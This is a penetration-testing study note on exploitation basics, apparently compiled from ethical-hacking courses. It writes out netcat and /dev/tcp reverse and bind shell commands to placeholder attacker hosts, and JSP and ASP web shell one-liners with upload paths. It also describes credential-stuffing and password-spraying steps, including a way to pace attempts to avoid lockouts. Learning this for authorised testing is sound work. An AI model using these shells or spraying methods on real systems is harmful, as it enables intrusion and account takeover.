# Exploitation (basics) Exploitation is the attack performed against a system or application based on the potential vulnerability discovered during our information gathering and enumeration.\ We use the information from the Information Gathering stage, analyze it in the Vulnerability Assessment stage, and prepare the potential attacks.\ Often many companies and systems use the same applications but make different decisions about their configuration.\ This is because the same application can often be used for various purposes, and each organization will have different objectives. > *Source: Hackthebox Academy* ## Shells ### Reverse shell ![image](https://user-images.githubusercontent.com/96747355/175835538-b00ec472-e4b3-4688-b062-25d37837b8b1.png) > *Source:*[*hackingtutorials.org*](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/) * The target connects back to us. Initiates a connection back to a "listener" on our attack box. * Example * in our attacking machine we type `nc -nlvp 4444` (4444 is the port) * in our target we connect be. For instance in case of a linux based machine we can do `netcat ATTACKING-MACHINE-IP 4444 -e /bin/bash` we could also use `/bin/bash -i >& /dev/tcp/ATTACKING-MACHINE-IP/4444 0>&1` ### Bind shell ![image](https://user-images.githubusercontent.com/96747355/175835567-7bb7a51d-7761-4cc8-983a-cc7087dacaac.png) > *Source:*[*hackingtutorials.org*](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/) * We connect to the target. "Binds" to a specific port on the target host and waits for a connection from our attack box. * Example * in our target we can do `nc -nlvp 4444 -e /bin/bash` * in our attacking machine we can do `nc TARGET-IP 4444` ### Web shell * Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command. * Communicates through a web server, accepts our commands through HTTP parameters, executes them, and prints back the output. #### PHP Web shell ```php ``` #### JSP webshell ```jsp <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ``` #### ASP webshell ```c# <% eval request("cmd") %> ``` #### Where to upload it | Web Server | Default Webroot | | ---------- | ------------------------ | | Apache | `/var/www/html/` | | Nginx | `/usr/local/nginx/html/` | | IIS | `c:\inetpub\wwwroot\` | | XAMPP | `C:\xampp\htdocs\` | * `echo '' > /var/www/html/shell.php` bash command for an Apache web server on linux * To access it `shell.php?cmd=id` with the browser * `curl http://SERVER_IP:PORT/shell.php?cmd=id` with the command line ## Payloads ![image](https://user-images.githubusercontent.com/96747355/175836279-e0f0e004-c75a-4d8e-b4de-9680e1b5306a.png) > *Source:*[*TCM Academy*](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course) * If one type of payload does not work we can try the other one ## Bruteforce attacks * Check out how to use hydra [here](https://csbygb.gitbook.io/pentips/tools/passwords-tools#hydra) * We can also use metasploit that has multiple modules for bruteforce attacks ## Credentials stuffing and password spraying * Methodology * Use leaked creds found during the enumeration phase on the login portals found during the enumeration phase * The goal of credentials stuffing and password spraying is to taking these credentials and throwing them at a website * We can use burp intruder for this * First we can see what we get when a login fails, and copy the string we get back * We send the login portal to intruder and we add the login and password as variables * We use a pitchfork attack * We make a grep-match on the string previously copied * Then in the payloads we take the list of users for the variable that corresponds to user and the list of passwords for the one that corresponds to the password. And then we just launch the attack. * In the results we will see the ones that are not valid with our grep match. We can also check the response (301 is redirect for example) and the size of the paylaod (if it is really different in one of the results * Password spraying: We can also try an attack with one password and try out multiple usernames * Caution here, checkout prior to your engagement if a lockout is in place how many tried before being locked out. When we know this we can then setup our attack to try something every hour or so. ## Possible paths after this step | Path | Description | | --------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Information Gathering | Once we have initial access to the target system, regardless of how high our privileges are at that moment, we need to gather information about the local system. Whether we use this new information for privilege escalation, lateral movement, or data exfiltration does not matter. Therefore, before we can take any further steps, we need to find out what we are dealing with. This inevitably takes us to the vulnerability assessment stage, where we analyze and evaluate the information we find. | | Post-Exploitation | Post-exploitation is mainly about escalating privileges if we have not yet attained the highest possible rights on the target host. As we know, more opportunities are open to us with higher privileges. This path actually includes the stages Information Gathering, Vulnerability Assessment, Exploitation, and Lateral Movement but from an internal perspective on the target system. The direct jump to post-exploitation is less frequent, but it does happen. Because through the exploitation stage, we may already have obtained the highest privileges, and from here on, we start again at Information Gathering. | | Lateral Movement | From here, we can also skip directly over to Lateral Movement. This can come under different conditions. If we have achieved the highest privileges on a dual-homed system used to connect two networks, we can likely use this host to start enumerating hosts that were not previously available to us. | | Proof-of-Concept | We can take the last path after gaining the highest privileges by exploiting an internal system. Of course, we do not necessarily have to have taken over all systems. However, if we have gained the Domain Admin privileges in an Active Directory environment, we can likely move freely across the entire network and perform any actions we can imagine. So we can create the Proof-of-Concept from our notes to detail and potentially automate the paths and activities and make them available to the technical department. | > *Source: HTB Academy* ## Resources {% embed url="" %} Hacking Tutorials {% endembed %} {% embed url="" %} Practical Ethical Hacking - TCM Security {% endembed %}